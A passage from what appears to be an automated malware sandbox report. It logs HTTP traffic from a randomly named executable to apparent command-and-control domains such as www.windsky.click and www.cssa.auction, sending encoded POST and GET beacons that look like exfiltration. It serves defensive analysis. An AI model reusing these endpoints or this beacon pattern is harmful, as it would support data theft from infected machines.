                                                                Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w||]XO14<JZE"Om8l*CcU:m,/t30


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.74999946.253.5.22180360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:41.940936089 CET1741OUTPOST /gybb/ HTTP/1.1
                                                                Host: www.windsky.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.windsky.click
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.windsky.click/gybb/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4e 38 4a 58 67 47 55 57 30 56 30 6c 6e 47 39 69 53 4e 2b 70 53 4d 70 36 43 79 4e 74 75 32 7a 4a 52 31 36 7a 42 79 76 30 49 52 34 48 66 4f 4f 6d 58 69 75 45 71 69 31 65 73 57 4a 46 38 4c 41 4b 49 72 2f 55 2b 30 55 65 74 66 6b 4d 47 58 64 4c 71 49 62 59 6f 37 48 43 6b 79 68 6d 66 6d 7a 38 55 45 46 6b 63 33 4e 49 4e 42 77 43 37 4b 61 2f 51 54 6a 66 79 6f 67 56 4f 79 6d 69 4a 72 64 61 44 7a 41 33 7a 76 79 45 4e 68 38 41 47 54 6c 4c 46 2f 32 6f 50 48 66 58 57 70 66 33 76 72 43 54 70 6f 2b 46 58 47 46 6c 43 6c 63 6c 52 61 4b 56 66 48 64 43 6c 7a 69 64 68 76 65 5a 64 66 50 6e 6c 6f 5a 75 51 52 2b 77 52 6f 45 50 69 6d 6e 39 73 76 6e 39 6f 6f 61 46 38 6e 49 50 73 75 6d 31 77 56 41 75 6a 4d 43 36 7a 39 68 31 33 49 56 52 48 68 78 68 51 36 69 55 47 61 74 46 73 66 55 47 50 53 5a 56 4f 36 4f 79 41 69 36 66 44 77 76 4f 71 66 4a 76 31 6d 62 5a 6a 32 67 59 62 4e 53 45 33 4d 64 6a 58 56 49 49 74 6a 70 31 71 78 71 59 75 43 48 37 4b 4b 73 32 71 46 35 57 4a 6f 61 [TRUNCATED]
                                                                Data Ascii: -Jkp4f=sCcUsF5VlWhXN8JXgGUW0V0lnG9iSN+pSMp6CyNtu2zJR16zByv0IR4HfOOmXiuEqi1esWJF8LAKIr/U+0UetfkMGXdLqIbYo7HCkyhmfmz8UEFkc3NINBwC7Ka/QTjfyogVOymiJrdaDzA3zvyENh8AGTlLF/2oPHfXWpf3vrCTpo+FXGFlClclRaKVfHdClzidhveZdfPnloZuQR+wRoEPimn9svn9ooaF8nIPsum1wVAujMC6z9h13IVRHhxhQ6iUGatFsfUGPSZVO6OyAi6fDwvOqfJv1mbZj2gYbNSE3MdjXVIItjp1qxqYuCH7KKs2qF5WJoaVp0ST+QHFuNP537UZR2sQaaLdAPCkvf5wFTeme1MJvIv6C6sFC9laPIxRzRz6JK9RnXs3GULKE4FozkITe5rAc3OGiX++DmfKkReFs3NNutccK9Jo8y0y4+qJqBEmp4NWZV3LjQln3kNxLHp0srBw9QQ6DPytwS3KrTnqjn/AtYy/4OFCleBwdPbUceNglCGGd1Aq5low1rASwSqG+htNSy51xqNh2Uuf/7Zq3rAPzeWVYritdO/cSbdFQq4PFnNU9u206ByNYUb/+4iNT2EGp2zYqId6Y0wCEoqTZjA2XGvWVbBj1UkarnA+ZC/unA/SJgA9f1LprhB9oguAgSlKEn0dCRkBbDsSfnu50HNfhMN3ln3pXDapafdzfbZcamILcUTuX3eQs+NJfonnkpLvkD6JGRwvwt3D9Ue5naGBoBKrjoSMS9aWWQvozmXh8kOY06V3FpcaJOeL/Cpk/gKdhwDRICX3iM6WSIWyc/tCasU6k+F9DTzy/t67uYrSfsek2LiJ/vj1e8jlIA5/feBtszknUF1QjpYm+iRgsBlBBThCSayXHeQrpl3HGQjR4ywPeujDDKoJjm5qz/yCY30CF0N9f+io4miQxCvBeYS+VK5Jbk0QSt2HFrfxrNrQ8hAbsiZgfQUjNaBw1w96LKXEeVMFZ3TlftKu1 [TRUNCATED]
                                                                Jan 11, 2025 05:11:42.759365082 CET774INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sat, 11 Jan 2025 04:11:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Content-Language: en
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Referrer-Policy: origin-when-cross-origin
                                                                X-XSS-Protection: 1; mode=block
                                                                Expect-CT: enforce; max-age=3600
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                Strict-Transport-Security: max-age=63072000
                                                                Content-Encoding: gzip
                                                                Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w||]XO14<JZE"Om8l*CcU:m,/t30


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.75000046.253.5.22180360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:44.484338999 CET450OUTGET /gybb/?-Jkp4f=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO/PgAZiplqYTotaLlxgtEc2zUWGdFSG0ILTc8yK+SY1eYqYdzLV7iMcxS&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.windsky.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:45.286318064 CET985INHTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sat, 11 Jan 2025 04:11:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Content-Language: en
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Referrer-Policy: origin-when-cross-origin
                                                                X-XSS-Protection: 1; mode=block
                                                                Expect-CT: enforce; max-age=3600
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                Strict-Transport-Security: max-age=63072000
                                                                Data Raw: 31 66 38 0d 0a 20 20 20 20 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 69 74 61 6e 63 65 20 6d 65 73 73 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 [TRUNCATED]
                                                                Data Ascii: 1f8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="styles.css"> <title>Maitance message</title> </head> <body> <div class="maintenance-message"> <h1>The website is undergoing maintenance. Please come back later.</h1> </div> </body> </html> 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.750001107.167.84.4280360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:51.019176006 CET705OUTPOST /rjvg/ HTTP/1.1
                                                                Host: www.cssa.auction
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.cssa.auction
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.cssa.auction/rjvg/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 45 36 31 67 48 44 35 33 64 49 74 4a 48 4e 61 45 43 37 76 6c 35 74 78 4d 6e 68 31 79 74 4e 39 56 42 75 68 54 6c 39 47 7a 55 43 59 33 4e 58 6f 33 2b 39 36 68 4f 51 38 6e 32 71 58 76 31 68 30 6c 30 72 41 78 56 30 34 4a 43 44 61 4a 6f 31 6c 2f 33 53 71 58 49 48 66 70 77 64 45 2b 54 2f 4f 74 78 62 74 53 7a 34 71 33 67 6c 51 32 6a 6e 72 4d 38 64 4f 72 58 32 77 43 37 4b 39 4a 4a 63 74 58 72 68 47 39 48 4f 35 66 35 5a 43 67 6c 4a 62 45 51 69 39 44 54 78 48 6c 39 5a 48 2f 5a 51 58 2f 46 65 70 34 68 33 4f 61 46 67 68 50 67 65 49 55 37 4d 71 6f 5a 58 42 31 32 46 76 67 46 4f 46 77 66 4d 7a 71 64 67 3d 3d
                                                                Data Ascii: -Jkp4f=gWg0hdzfwUNWE61gHD53dItJHNaEC7vl5txMnh1ytN9VBuhTl9GzUCY3NXo3+96hOQ8n2qXv1h0l0rAxV04JCDaJo1l/3SqXIHfpwdE+T/OtxbtSz4q3glQ2jnrM8dOrX2wC7K9JJctXrhG9HO5f5ZCglJbEQi9DTxHl9ZH/ZQX/Fep4h3OaFghPgeIU7MqoZXB12FvgFOFwfMzqdg==
                                                                Jan 11, 2025 05:11:51.567260981 CET992INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                content-type: text/html
                                                                content-length: 795
                                                                date: Sat, 11 Jan 2025 04:11:51 GMT
                                                                server: LiteSpeed
                                                                location: https://www.cssa.auction/rjvg/
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.750002107.167.84.4280360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:53.568902969 CET725OUTPOST /rjvg/ HTTP/1.1
                                                                Host: www.cssa.auction
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.cssa.auction
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.cssa.auction/rjvg/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 46 62 46 67 55 77 68 33 61 6f 74 4f 62 64 61 45 62 72 75 75 35 74 39 4d 6e 67 78 69 73 2f 5a 56 47 4d 70 54 33 50 75 7a 58 43 59 33 46 33 6f 79 36 39 36 6d 4f 51 78 53 32 76 33 76 31 67 51 6c 30 75 45 78 56 48 51 4b 44 54 61 4c 6e 56 6c 39 34 79 71 58 49 48 66 70 77 63 6b 51 54 2f 57 74 32 76 70 53 78 5a 71 34 6d 56 51 35 7a 33 72 4d 34 64 4f 56 58 32 77 38 37 49 4a 76 4a 66 56 58 72 6b 69 39 48 61 74 63 77 5a 43 69 71 70 61 39 52 43 67 55 4c 69 72 74 39 37 62 53 41 58 48 65 4e 49 6f 61 37 56 43 32 62 78 5a 30 6b 63 73 69 73 71 33 64 62 57 46 74 37 6e 62 42 61 35 67 61 53 65 53 75 4c 66 69 4e 43 72 6f 4e 71 69 67 67 78 65 6d 76 67 78 56 62 63 43 77 3d
                                                                Data Ascii: -Jkp4f=gWg0hdzfwUNWFbFgUwh3aotObdaEbruu5t9Mngxis/ZVGMpT3PuzXCY3F3oy696mOQxS2v3v1gQl0uExVHQKDTaLnVl94yqXIHfpwckQT/Wt2vpSxZq4mVQ5z3rM4dOVX2w87IJvJfVXrki9HatcwZCiqpa9RCgULirt97bSAXHeNIoa7VC2bxZ0kcsisq3dbWFt7nbBa5gaSeSuLfiNCroNqiggxemvgxVbcCw=
                                                                Jan 11, 2025 05:11:54.116445065 CET992INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                content-type: text/html
                                                                content-length: 795
                                                                date: Sat, 11 Jan 2025 04:11:54 GMT
                                                                server: LiteSpeed
                                                                location: https://www.cssa.auction/rjvg/
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.750003107.167.84.4280360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:56.114789963 CET1738OUTPOST /rjvg/ HTTP/1.1
                                                                Host: www.cssa.auction
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.cssa.auction
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.cssa.auction/rjvg/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 46 62 46 67 55 77 68 33 61 6f 74 4f 62 64 61 45 62 72 75 75 35 74 39 4d 6e 67 78 69 73 2f 52 56 42 35 39 54 6d 59 61 7a 57 43 59 33 45 33 6f 7a 36 39 37 6a 4f 51 70 57 32 76 79 55 31 6a 34 6c 32 4d 4d 78 65 57 51 4b 4b 54 61 4c 69 6c 6c 38 33 53 72 4e 49 48 50 74 77 63 55 51 54 2f 57 74 32 70 46 53 32 49 71 34 6b 56 51 32 6a 6e 72 59 38 64 50 34 58 32 59 4b 37 4c 6c 5a 4a 76 31 58 72 45 79 39 45 76 35 63 79 35 43 61 70 70 61 4d 52 43 74 54 4c 69 6d 57 39 36 2f 30 41 51 7a 65 64 4e 5a 6b 67 30 4b 73 50 44 63 68 75 4f 34 53 6b 73 76 58 43 6b 39 30 36 57 43 69 58 70 38 6b 66 63 79 54 4e 75 66 43 57 36 35 35 6c 48 38 48 2b 75 62 33 31 53 31 2b 47 58 51 68 6e 76 6f 56 33 79 67 4b 44 57 62 75 77 4f 4d 64 78 68 71 39 44 41 66 51 45 6f 4d 6a 7a 4f 63 6a 74 46 46 4e 4d 43 4c 6a 31 4b 34 66 68 47 33 4c 4a 32 67 38 38 59 6d 68 32 76 6a 45 70 47 52 53 6e 6e 70 6f 45 65 49 68 2f 71 33 31 72 31 4c 74 64 4c 74 33 65 62 4d 67 4d 32 6d 51 48 61 2b 79 65 34 46 [TRUNCATED]
                                                                Data Ascii: -Jkp4f=gWg0hdzfwUNWFbFgUwh3aotObdaEbruu5t9Mngxis/RVB59TmYazWCY3E3oz697jOQpW2vyU1j4l2MMxeWQKKTaLill83SrNIHPtwcUQT/Wt2pFS2Iq4kVQ2jnrY8dP4X2YK7LlZJv1XrEy9Ev5cy5CappaMRCtTLimW96/0AQzedNZkg0KsPDchuO4SksvXCk906WCiXp8kfcyTNufCW655lH8H+ub31S1+GXQhnvoV3ygKDWbuwOMdxhq9DAfQEoMjzOcjtFFNMCLj1K4fhG3LJ2g88Ymh2vjEpGRSnnpoEeIh/q31r1LtdLt3ebMgM2mQHa+ye4FChMl9PgzxvqTG3siRapeUr906RkfUcBYFS5GKLi509MuWTumogT1awVNxu+MsEQ4UJHR/0Ni6W39Mg+grefM7peMtjg0PDoPmg9SU5qcev+0HVin6SDeOlmqTUz441Gs2pdjiD9z5/fzx2DEaGbT+mfgJLSobomEcT3M4WSU93IcW7Q05AjyAueLMWBMWg7nHY0kgADnVEQli2+x9enVONAwRTJulIS5SUqPjNI6JRYfi9MyO18A+7RqVCPQlso4llZW7+hu8JlStTfNr1zkVZ+ssG8ODOLn3Lj3V2sziimN+3XHS/ZqURCwkcNuY4FdThSncKMF2k30wv1FzhpOfDUv4bhtxd7M/tqAfb9TmhAk/B18NO0Deefy/cKTmhzbHYxZ1Vo4thWQbZGcA3hF/qxbkM/OSXiLdAeKS/Mq0mMO7+wlj+fcJ4+e+M/tS1Uhxn1gsjzMTQ1PGsBPHLCUwMD4FeF4PRhC3r5igauLQpJYAKI41B/dX09CYEhUvldw3XUVyV1ygAGlCVN20ZEwlOhUVZGVT1IvU/LahecRS1Q8UCD3ggCymiPDTL//PUG6jMkTwvbMs4hRgCI2M+nT2xYSXnWRK71BVKVGHOzix0rACNiU4jpYGSdzpu0by2Xy0tpK86Yunnh/GruKni+AwPK5Nw1xrEMPMq [TRUNCATED]
                                                                Jan 11, 2025 05:11:56.683727026 CET992INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                content-type: text/html
                                                                content-length: 795
                                                                date: Sat, 11 Jan 2025 04:11:56 GMT
                                                                server: LiteSpeed
                                                                location: https://www.cssa.auction/rjvg/
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.750004107.167.84.4280360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:11:58.656742096 CET449OUTGET /rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.cssa.auction
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
